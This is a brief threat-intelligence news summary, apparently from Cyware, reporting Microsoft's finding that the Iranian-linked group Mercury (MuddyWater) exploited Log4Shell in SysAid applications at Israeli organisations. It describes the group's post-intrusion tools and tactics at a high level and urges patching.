Mercury APT aka MuddyWater, a group sponsored by the Iranian regime, is abusing the Log4Shell vulnerability in SysAid applications. It attempts to gain initial access to the targeted organizations.

The attack

Researchers from Microsoft reported that the Mercury group is abusing a flaw in vulnerable SysAid apps used by Israeli organizations. 
  • The group uses Log4j 2 exploits against VMware apps earlier in 2022 and now abused a similar flaw in SysAid apps
  • The attackers have used different techniques to communicate with their C2 server, such as PowerShell.
  • Further, a tunneling tool vpnui.exe (unique version of Ligolo) and remote monitoring software eHorus were used in attacks.

Post-infection tactics

  • After getting inside the target network, attackers establish persistence and move laterally within the organization (by using Windows Management Instrumentation (WMI) and remote services leveraging RemCom tool and dump credentials.
  • The group used both custom hacking tools and built-in operating system tools for hands-on keyboard attacks.

Despite SysAid fixing the Log4Shell flaw after its disclosure, several organizations haven’t applied the patch yet.

Conclusion

All the SysAid applications targeted by the Mercury APT group belonged to Israeli organizations. Moreover, the use of a plethora of tools indicates that the group possesses a wide range of skills and access to a wide range of resources. Thus, organizations in that region and other areas are suggested to follow the recommendations provided by Microsoft to stay protected.
Cyware Publisher

Publisher

Cyware